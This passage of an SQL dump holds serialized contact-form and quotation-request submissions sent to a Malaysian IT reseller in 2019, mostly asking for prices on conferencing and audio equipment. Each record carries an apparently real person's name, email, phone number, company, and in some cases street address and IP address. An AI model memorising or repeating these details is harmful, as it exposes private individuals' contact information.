Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Riccardo Boratti\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:31:\"riccardo.boratti@menz-gasser.it\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"012 3200972\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Menz &amp; Gasser KL sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"interested in Jabra PanaCast\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"72\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-07 11:48:42','113.210.183.78','1'),(295,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"MUHAMMAD RAFIQ\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"rafiq@thebigthreeproductions.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0173697807\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"BIG CORRIDOR SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:100:\"Hi i would like to get a quotation for Synology NAS with 4 and 5 bays including HDD and installation\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"62\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-10 16:17:01','202.190.52.195','1'),(296,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Carter Chan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"carter.chan@rawstudio.cc\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0174803886\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Raw Studio\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:87:\"Hi , i looking small 5-6pax conference call equipment for rent, do you all do renting ?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"99\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-11 22:26:06','202.186.195.138','1'),(297,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Chan Soo Yen\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"procurement@bcbuilders.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"017 6618299\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:38:\"BC Builders Concept Furnishing Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:63:\"Lot 507, Jalan TUDM, Kg. Baru Subang, 40150 Shah Alam, Selangor\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:114:\"Kindly quote for Logitech Group Conference Cam Video Conference (960-001054) (Qty 1set), please reply ASAP. Thanks\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-12 10:33:42','1.9.178.73','1'),(298,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Bestian Tan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"bestiantan@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0124482235\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"BestianKelly Photography\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:143:\"Hi I am Bestienz here, am looking for App developer, do you have sales support at penang island side? Feel free to whatsapp me for convenience.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-12 11:12:57','161.142.239.139','1'),(299,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Khairul Arifin\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"kasabri33@gmail.comm\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122863949\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"Sanden Air-conditioning (M) SDN Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:53:\"Looking for Zebra Printer printing ribbon and service\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"74\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-13 22:05:41','123.136.116.218','1'),(300,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"HC NEW\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"hcnew@khletrik.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164107900\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"kwee hong letrik sdn bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"please quote me logitech conferencing\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-17 09:21:08','175.144.148.187','1'),(301,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"SHAFFIQ BIN ABDULLAH\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"trading@srebro.com.my\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"018-6698913\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"SREBRO SOLUTIONS SDN BHD\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:65:\"No 24 Jalan Nilam 1/1 â€¢ Subang Hi-Tech 40000 Shah Alam Selangor\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Jabra Evolve 65t\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:154:\"We need your assistance to quote your best price and fastest delivery for the following item : Jabra evolve 65t (6598-832-109) titanium black QTY : 6 Each\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"22\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-17 10:42:16','175.139.247.195','1'),(302,12,'a:11:{i:0;a:7:{s:2:\"id\";s:3:\"126\";s:4:\"slug\";s:19:\"get-quotation-jabra\";s:4:\"name\";s:21:\"Get Quotation (Jabra)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:3:\"129\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Irwan Effendy bin Md Ali\";}i:2;a:7:{s:2:\"id\";s:3:\"130\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"ie.bayujuarajati@gmail.com\";}i:3;a:7:{s:2:\"id\";s:3:\"133\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60192869395\";}i:4;a:7:{s:2:\"id\";s:3:\"131\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"Bayu Juara Jati Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:3:\"135\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:102:\"No. 184 &amp; No. 185, Jalan S2 C9, Green Technology Park, Seremban 2, 70300 Seremban, Negeri Sembilan\";}i:6;a:7:{s:2:\"id\";s:3:\"134\";s:4:\"slug\";s:7:\"product\";s:4:\"name\";s:7:\"Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:642:\"a:19:{i:0;s:16:\"Jabra Evolve 65t\";i:1;s:15:\"Jabra Evolve 80\";i:2;s:16:\"Jabra Evolve 75e\";i:3;s:15:\"Jabra Evolve 75\";i:4;s:29:\"Jabra Evolve 65 Stereo / Mono\";i:5;s:29:\"Jabra Evolve 40 Stereo / Mono\";i:6;s:29:\"Jabra Evolve 30 Stereo / Mono\";i:7;s:29:\"Jabra Evolve 20 Stereo / Mono\";i:8;s:18:\"Jabra Evolve 20 SE\";i:9;s:15:\"Jabra Engage 50\";i:10;s:17:\"Jabra Biz 2400 II\";i:11;s:29:\"Jabra BIZ 2400 II Mono 3-in-1\";i:12;s:21:\"Jabra Biz 2400 II DUO\";i:13;s:14:\"Jabra Biz 2300\";i:14;s:17:\"Jabra BIZ 2300 